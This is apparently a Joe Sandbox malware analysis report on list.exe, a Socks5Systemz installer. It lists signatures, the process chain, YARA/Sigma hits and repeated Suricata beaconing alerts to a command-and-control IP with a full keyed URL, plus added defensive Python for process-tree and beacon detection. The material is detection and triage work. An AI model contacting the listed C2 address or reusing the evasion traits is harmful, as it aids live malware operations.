Windows Analysis Report
list.exe

Overview

General Information

Sample name: list.exe
Analysis ID: 1577465
MD5: 8eabea9b74251fe67f24b87e54486643
SHA1: b8549e3abe3828be7164e507414658df238c2652
SHA256: ec252c14b60754a9e280e0e4624077fcc3af03347f1a585b539f8d100777ad22
Tags: bulletproof, exe, Socks5Systemz, user-abus3reports

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • list.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\list.exe" MD5: 8EABEA9B74251FE67F24B87E54486643)
    • list.tmp (PID: 7352 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe" MD5: 048F12CF9C44FE7D997B30F23A9A2228)
      • bsoftvideocapture33.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i MD5: A5B9D0E5F04BC3D01C9E97A61F27EB8F)
  • svchost.exe (PID: 7380 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7432 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7488 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7548 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7600 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 720 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7792 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
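The process tree above is the whole installer chain: the submitted list.exe extracts list.tmp into an is-XXXXX.tmp folder under %TEMP% and hands off to it with /SL5= (the Inno Setup bootstrap convention), and list.tmp in turn launches the dropped bsoftvideocapture33.exe from a user-writable directory. The list.tmp command line also uses the 8.3 short name "user~1", which is what the report's Sigma match "Use Short Name Path in Command Line" keyed on. The following is an added example, not part of the Joe Sandbox report: it parses the tree text copied from above into parent/child records and runs two checks over it. The check names and rule logic are this example's own approximation, not the Sigma rule itself.

```python
"""Parse the Joe Sandbox process tree and run two process-chain checks.

Added example; not part of the report.  PROCESS_TREE is copied from the report
above.  The Inno Setup /SL5= hand-off and the 8.3 short-name pattern (~1\\) are
well-known conventions; the rule names and thresholds here are assumptions.
"""
import re

PROCESS_TREE = r"""
  • System is w10x64
  • list.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\list.exe" MD5: 8EABEA9B74251FE67F24B87E54486643)
    • list.tmp (PID: 7352 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe" MD5: 048F12CF9C44FE7D997B30F23A9A2228)
      • bsoftvideocapture33.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe" -i MD5: A5B9D0E5F04BC3D01C9E97A61F27EB8F)
  • svchost.exe (PID: 7380 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7600 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 720 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
"""

# One tree node per line: indentation, bullet, image name, PID, command line, MD5.
NODE_RE = re.compile(
    r"^(?P<indent> *)• (?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmdline>.*) "
    r"MD5: (?P<md5>[0-9A-Fa-f]{32})\)\s*$"
)
# An 8.3 short-name path component such as "user~1\" inside a command line.
SHORT_NAME_RE = re.compile(r"~\d+\\")


def parse_tree(text: str) -> list:
    """Two spaces of indentation per level encode the parent relationship."""
    nodes, last_pid_at_depth = [], {}
    for line in text.splitlines():
        m = NODE_RE.match(line)
        if not m:  # e.g. "System is w10x64" carries no PID
            continue
        depth = len(m["indent"]) // 2
        node = {
            "pid": int(m["pid"]),
            "ppid": last_pid_at_depth.get(depth - 1),  # None for top-level nodes
            "image": m["image"],
            "cmdline": m["cmdline"],
            "md5": m["md5"].lower(),
        }
        last_pid_at_depth[depth] = node["pid"]
        nodes.append(node)
    return nodes


def short_name_in_cmdline(node: dict) -> bool:
    return bool(SHORT_NAME_RE.search(node["cmdline"]))


def inno_setup_handoff(node: dict, by_pid: dict) -> bool:
    """Inno Setup bootstrap: a parent .exe extracts <name>.tmp into an
    is-XXXXX.tmp folder under %TEMP% and runs it with /SL5="$hwnd,...,<parent path>"."""
    parent = by_pid.get(node["ppid"])
    return (
        parent is not None
        and node["image"].lower().endswith(".tmp")
        and "\\is-" in node["cmdline"]
        and "/SL5=" in node["cmdline"]
    )


def findings(text: str) -> list:
    """Return (pid, reason) pairs for every node that trips a check."""
    nodes = parse_tree(text)
    by_pid = {n["pid"]: n for n in nodes}
    out = []
    for n in nodes:
        if short_name_in_cmdline(n):
            out.append((n["pid"], "short (8.3) path in command line"))
        if inno_setup_handoff(n, by_pid):
            out.append((n["pid"], f"Inno Setup /SL5= hand-off from PID {n['ppid']}"))
    return out


if __name__ == "__main__":
    for pid, reason in findings(PROCESS_TREE):
        print(pid, reason)
```

The /SL5= hand-off is what every Inno Setup installer does, so on its own it is not malicious; it becomes interesting here because of what the hand-off then launches (a freshly dropped executable in %LOCALAPPDATA%) and what that process does on the network.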
No configs have been found
Source | Rule | Description | Author
C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-7DT4P.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author
00000006.00000000.1278089923.0000000000401000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000002.00000002.2504041070.0000000005A20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
Process Memory Space: bsoftvideocapture33.exe PID: 7528 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security

Source | Rule | Description | Author
6.0.bsoftvideocapture33.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp, ParentCommandLine: "C:\Users\user\Desktop\list.exe", ParentImage: C:\Users\user\Desktop\list.exe, ParentProcessId: 7296, ParentProcessName: list.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp\list.tmp" /SL5="$10438,3326084,56832,C:\Users\user\Desktop\list.exe", ProcessId: 7352, ProcessName: list.tmp
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7380, ProcessName: svchost.exe
Suricata alerts, SID 2028765 (Severity 3, Classtype: Unknown Traffic). Every row is 192.168.2.7 -> 188.119.66.185:443 over TCP; only the timestamp and the source port differ:
Timestamp | Source Port
2024-12-18T14:00:02.379653+0100 | 49795
2024-12-18T14:00:05.316086+0100 | 49804
2024-12-18T14:00:08.584340+0100 | 49813
2024-12-18T14:00:11.311309+0100 | 49819
2024-12-18T14:00:13.882631+0100 | 49824
2024-12-18T14:00:16.573601+0100 | 49832
2024-12-18T14:00:19.325465+0100 | 49838
2024-12-18T14:00:21.766157+0100 | 49843
2024-12-18T14:00:24.333991+0100 | 49848
2024-12-18T14:00:26.975544+0100 | 49853
2024-12-18T14:00:29.909378+0100 | 49860
2024-12-18T14:00:32.931169+0100 | 49868
2024-12-18T14:00:35.935185+0100 | 49875
2024-12-18T14:00:38.547635+0100 | 49885
2024-12-18T14:00:40.992337+0100 | 49891
2024-12-18T14:00:43.262705+0100 | 49897
2024-12-18T14:00:45.771653+0100 | 49903
2024-12-18T14:00:48.542708+0100 | 49909
2024-12-18T14:00:51.173700+0100 | 49915
2024-12-18T14:00:53.662666+0100 | 49922
2024-12-18T14:00:56.041453+0100 | 49928
2024-12-18T14:00:58.823131+0100 | 49934
2024-12-18T14:01:01.592108+0100 | 49944
2024-12-18T14:01:04.322674+0100 | 49950
2024-12-18T14:01:07.308660+0100 | 49956
2024-12-18T14:01:10.190420+0100 | 49967
Suricata alerts, SID 2803274 (Severity 2, Classtype: Potentially Bad Traffic). Every row is 192.168.2.7 -> 188.119.66.185:443 over TCP; only the timestamp and the source port differ:
Timestamp | Source Port
2024-12-18T14:00:03.416230+0100 | 49795
2024-12-18T14:00:06.413497+0100 | 49804
2024-12-18T14:00:09.530883+0100 | 49813
2024-12-18T14:00:11.997868+0100 | 49819
2024-12-18T14:00:14.654720+0100 | 49824
2024-12-18T14:00:17.561270+0100 | 49832
2024-12-18T14:00:20.002065+0100 | 49838
2024-12-18T14:00:22.466431+0100 | 49843
2024-12-18T14:00:25.371903+0100 | 49848
2024-12-18T14:00:27.925819+0100 | 49853
2024-12-18T14:00:30.743519+0100 | 49860
2024-12-18T14:00:34.040700+0100 | 49868
2024-12-18T14:00:36.956646+0100 | 49875
2024-12-18T14:00:39.269197+0100 | 49885
2024-12-18T14:00:41.670874+0100 | 49891
2024-12-18T14:00:44.007513+0100 | 49897
2024-12-18T14:00:46.503947+0100 | 49903
2024-12-18T14:00:49.475698+0100 | 49909
2024-12-18T14:00:52.086221+0100 | 49915
2024-12-18T14:00:54.349196+0100 | 49922
2024-12-18T14:00:56.735721+0100 | 49928
2024-12-18T14:00:59.849002+0100 | 49934
2024-12-18T14:01:02.555588+0100 | 49944
2024-12-18T14:01:05.207393+0100 | 49950
2024-12-18T14:01:08.431803+0100 | 49956
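The two alert tables describe one behaviour: a new TCP connection from 192.168.2.7 to 188.119.66.185:443 every 2.3 to 3.3 seconds, each from a fresh, strictly increasing ephemeral source port, with the SID 2803274 alert firing about a second after the SID 2028765 alert on the same port (the JA3 rule sees the ClientHello, the header-pattern rule the request that follows on the same connection). That fixed-interval, one-connection-per-check-in shape is what analysts call beaconing. The "Possible Dridex" label on the JA3 rule is a fingerprint of the TLS client stack and is shared by many unrelated programs, so treat it as a weak indicator and not as attribution. The following is an added example, not part of the Joe Sandbox report, that computes the interval statistics over the timestamps copied from the SID 2028765 table; the thresholds are assumptions.

```python
"""Periodicity check over the Suricata alert timestamps tabulated above.

Added example, not part of the Joe Sandbox report.  ALERTS is copied from the
SID 2028765 table (one row per TCP connection 192.168.2.7 -> 188.119.66.185:443);
the thresholds in beacon_profile() are assumptions chosen for illustration.
"""
from datetime import datetime
from statistics import mean, pstdev

ALERTS = [  # (timestamp, ephemeral source port), copied from the report
    ("2024-12-18T14:00:02.379653+0100", 49795),
    ("2024-12-18T14:00:05.316086+0100", 49804),
    ("2024-12-18T14:00:08.584340+0100", 49813),
    ("2024-12-18T14:00:11.311309+0100", 49819),
    ("2024-12-18T14:00:13.882631+0100", 49824),
    ("2024-12-18T14:00:16.573601+0100", 49832),
    ("2024-12-18T14:00:19.325465+0100", 49838),
    ("2024-12-18T14:00:21.766157+0100", 49843),
    ("2024-12-18T14:00:24.333991+0100", 49848),
    ("2024-12-18T14:00:26.975544+0100", 49853),
    ("2024-12-18T14:00:29.909378+0100", 49860),
    ("2024-12-18T14:00:32.931169+0100", 49868),
    ("2024-12-18T14:00:35.935185+0100", 49875),
    ("2024-12-18T14:00:38.547635+0100", 49885),
    ("2024-12-18T14:00:40.992337+0100", 49891),
    ("2024-12-18T14:00:43.262705+0100", 49897),
    ("2024-12-18T14:00:45.771653+0100", 49903),
    ("2024-12-18T14:00:48.542708+0100", 49909),
    ("2024-12-18T14:00:51.173700+0100", 49915),
    ("2024-12-18T14:00:53.662666+0100", 49922),
    ("2024-12-18T14:00:56.041453+0100", 49928),
    ("2024-12-18T14:00:58.823131+0100", 49934),
    ("2024-12-18T14:01:01.592108+0100", 49944),
    ("2024-12-18T14:01:04.322674+0100", 49950),
    ("2024-12-18T14:01:07.308660+0100", 49956),
    ("2024-12-18T14:01:10.190420+0100", 49967),
]


def parse_ts(ts: str) -> datetime:
    """strptime's %z accepts the "+0100" offset style used in the report."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def inter_arrival_seconds(rows) -> list:
    """Gaps between consecutive connections, in seconds."""
    times = sorted(parse_ts(ts) for ts, _ in rows)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def beacon_profile(rows, max_cv: float = 0.25, min_connections: int = 8) -> dict:
    """Summarise periodicity of connections to one destination.

    A low coefficient of variation (stdev / mean of the gaps) across many
    connections is the classic fixed-interval beacon shape.  Jittered beacons
    push the CV up, and legitimate pollers (updaters, telemetry) can look
    periodic too, so this is a triage signal to combine with other indicators.
    """
    deltas = inter_arrival_seconds(rows)
    if not deltas:
        return {"connections": len(rows), "is_beacon": False}
    ports = [port for _, port in rows]
    avg, sd = mean(deltas), pstdev(deltas)
    cv = sd / avg
    return {
        "connections": len(rows),
        "mean_interval_s": round(avg, 3),
        "stdev_s": round(sd, 3),
        "cv": round(cv, 3),
        # Unique, strictly increasing source ports: a fresh TCP connection
        # per check-in rather than one long-lived session.
        "fresh_connection_each_time": ports == sorted(set(ports)),
        "is_beacon": len(rows) >= min_connections and cv <= max_cv,
    }


if __name__ == "__main__":
    print(beacon_profile(ALERTS))
```

In a SIEM the same computation runs per (source host, destination, port) tuple over a sliding window; the per-destination grouping matters, because the report's sandbox also produced ordinary Windows service traffic that would otherwise dilute the statistics.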

                    AV Detection

Source: https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e3008889325 | Avira URL Cloud: Label: malware
Source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe | ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | ReversingLabs: Detection: 37%
Source: list.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,2_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0045D254 ArcFourCrypt,2_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0045D23C ArcFourCrypt,2_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_10001000 ISCryptGetVersion,2_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_10001130 ArcFourCrypt,2_2_10001130

                    Compliance

Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Unpacked PE file: 6.2.bsoftvideocapture33.exe.400000.0.unpack
Source: list.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Brekkiesoft Video Capture_is1
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: Binary string: msvcp71.pdbx# source: is-0G4JQ.tmp.2.dr
Source: Binary string: msvcr71.pdb< source: is-5FBME.tmp.2.dr
Source: Binary string: msvcp71.pdb source: is-0G4JQ.tmp.2.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-B9LPS.tmp.2.dr
Source: Binary string: msvcr71.pdb source: is-5FBME.tmp.2.dr
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00452A60 FindFirstFileA,GetLastError,2_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,2_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose,2_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00463CDC
Source: Joe Sandbox View | IP Address: 188.119.66.185 188.119.66.185
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49795 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49804 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49813 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49819 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49824 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49832 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49843 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49838 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49853 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49860 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49848 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49885 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49891 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49903 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49868 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49897 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49875 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49922 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49915 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49909 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49928 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49934 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49944 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49950 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49956 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49967 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49813 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49804 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49853 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49843 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49819 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49860 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49832 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49795 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49868 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49848 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49838 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49885 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49903 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49875 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49824 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49891 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49950 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49934 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49956 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49928 -> 188.119.66.185:443
